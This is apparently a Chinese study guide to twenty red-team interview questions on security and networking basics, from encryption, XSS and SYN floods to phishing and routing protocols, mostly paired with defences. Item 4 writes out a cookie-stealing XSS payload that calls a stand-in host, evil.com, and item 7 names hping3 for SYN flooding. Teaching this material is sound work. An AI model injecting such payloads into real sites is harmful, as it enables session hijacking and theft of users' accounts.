红队面试题详细解析(一)【1-20题】
红队面试题详细解析(一)【1-20题】
1. 对称加密和非对称加密
原理:
- 对称加密:加密和解密使用同一个密钥。常见算法有AES、DES。优点是速度快,缺点是密钥分发困难。
- 非对称加密:加密和解密使用一对公钥和私钥。常见算法有RSA、ECC。优点是密钥分发安全,缺点是速度慢。
举例:
- 对称加密:小明用AES加密文件,解密时也用同一个密钥。
- 非对称加密:小明用小红的公钥加密消息,小红用自己的私钥解密。
进阶:
- 实际应用中常结合使用,如HTTPS握手时先用非对称加密交换密钥,再用对称加密传输数据。
2. 什么是同源策略?
原理:
- 浏览器安全机制,限制不同源之间的资源访问,防止恶意网站窃取数据。
- “同源”指协议、域名、端口都相同。
举例:
进阶:
- 可通过CORS跨域资源共享进行授权访问。
3. cookie 存在哪里?可以打开吗?
原理:
- cookie存储在浏览器本地(如Chrome的profile目录),也可通过开发者工具查看。
举例:
- F12打开开发者工具,Application/Cookies标签可查看和编辑cookie。
进阶:
- 服务端也能通过HTTP头设置和读取cookie。
4. xss 如何盗取 cookie?
原理:
- 利用XSS漏洞注入恶意JS代码,读取document.cookie并发送到攻击者服务器。
举例:
<script>fetch('http://evil.com/?c='+document.cookie)</script>进阶:
- 若cookie设置了HttpOnly属性,则JS无法读取。
5. xss 有 cookie 一定可以无用户名密码登录吗?
原理:
- 不一定。部分网站cookie绑定IP、UA或有二次验证,单纯拿到cookie未必能直接登录。
举例:
- 某些银行网站cookie和设备信息绑定,盗取cookie无法复现登录态。
进阶:
- 实战中需结合会话机制分析。
6. xss 如何防御?
原理:
- 输入输出严格过滤,转义特殊字符,设置HttpOnly、Content-Security-Policy等。
举例:
- 后端对用户输入进行html实体编码,前端设置CSP禁止外部脚本。
进阶:
- 使用安全框架如OWASP ESAPI,定期安全测试。
7. SYN 攻击原理
原理:
- 攻击者发送大量SYN包,目标服务器分配资源等待ACK,导致资源耗尽拒绝服务(SYN Flood)。
举例:
- 使用hping3工具模拟SYN Flood攻击。
进阶:
- 防御方法:SYN Cookie、限速、流量清洗。
8. 什么是网络钓鱼?
原理:
- 伪造合法网站或邮件,诱骗用户输入敏感信息(账号、密码)。
举例:
- 伪造银行登录页面,诱导用户输入账号密码。
进阶:
- 防御:提高安全意识,检查网址、使用双因素认证。
9. 什么是 CC 攻击?
原理:
- Challenge Collapsar,利用大量HTTP请求耗尽服务器资源,属于应用层DDoS。
举例:
- 攻击者用脚本不断请求目标网站页面,导致服务器崩溃。
进阶:
- 防御:WAF、限流、验证码。
10. Web 服务器被入侵后,怎样进行排查?
原理:
- 检查异常进程、文件、日志,分析入侵路径和后门。
举例:
- 查看web目录是否有异常文件,分析access.log和error.log。
进阶:
- 使用安全工具(如chkrootkit、rkhunter),恢复备份,修补漏洞。
11. dll 文件是什么意思,有什么用?
原理:
- 动态链接库(Dynamic Link Library),存放可被多个程序调用的函数和资源。
举例:
- Windows下很多程序依赖dll文件,如user32.dll。
进阶:
- dll劫持是一种攻击方式,攻击者替换dll实现代码执行。
12. Https 的作用
原理:
- 用于加密HTTP数据传输,防止中间人窃听和篡改。
举例:
进阶:
- 通过SSL/TLS协议实现,包含身份认证和数据加密。
13. 防范常见的 Web 攻击
原理:
- 输入验证、权限控制、加密传输、定期安全测试。
举例:
- 防SQL注入:参数化查询;防XSS:输出转义。
进阶:
- 使用WAF、定期漏洞扫描、代码审计。
14. 重要协议分布层
原理:
- OSI七层模型:物理层、数据链路层、网络层、传输层、会话层、表示层、应用层。
- TCP/IP模型:网络接口层、网络层、传输层、应用层。
举例:
- HTTP属于应用层,TCP属于传输层,IP属于网络层。
进阶:
- 理解协议分层有助于定位安全问题。
15. arp 协议的工作原理
原理:
- 地址解析协议,将IP地址解析为MAC地址,用于局域网通信。
举例:
- 主机A广播ARP请求,询问“谁是192.168.1.1”,主机B回应自己的MAC。
进阶:
- ARP欺骗可导致流量劫持。
16. rip 协议是什么?rip 的工作原理
原理:
- 路由信息协议(RIP),基于距离矢量算法,定期广播路由表,选择跳数最少的路径。
举例:
- 路由器每30秒广播一次路由信息。
进阶:
- RIP适合小型网络,大型网络推荐OSPF/BGP。
17. 什么是 RARP?工作原理
原理:
- 逆地址解析协议(RARP),通过MAC地址获取IP地址,常用于无盘工作站。
举例:
- 设备只知道自己的MAC,通过RARP服务器获取IP。
进阶:
- 已被DHCP取代。
18. OSPF 协议?OSPF 的工作原理
原理:
- 开放最短路径优先(OSPF),链路状态路由协议,维护全网拓扑,计算最短路径。
举例:
- 路由器通过LSA交换链路状态,动态更新路由表。
进阶:
- 适合大型网络,支持分区域管理。
19. TCP 与 UDP 区别总结
原理:
- TCP:面向连接,可靠传输,顺序保证,慢。
- UDP:无连接,不保证可靠,速度快,适合实时应用。
举例:
- TCP用于网页、文件传输;UDP用于视频、语音。
进阶:
- TCP有三次握手,UDP无握手过程。
20. 什么是三次握手四次挥手?
原理:
- TCP建立连接需三次握手,断开连接需四次挥手,保证连接可靠和数据完整。
举例:
- 客户端发送SYN,服务端回应SYN-ACK,客户端回应ACK,连接建立。
- 断开时双方各自发送FIN和ACK,共四步。
进阶:
- 握手过程可防止旧连接干扰,挥手确保数据传输完成。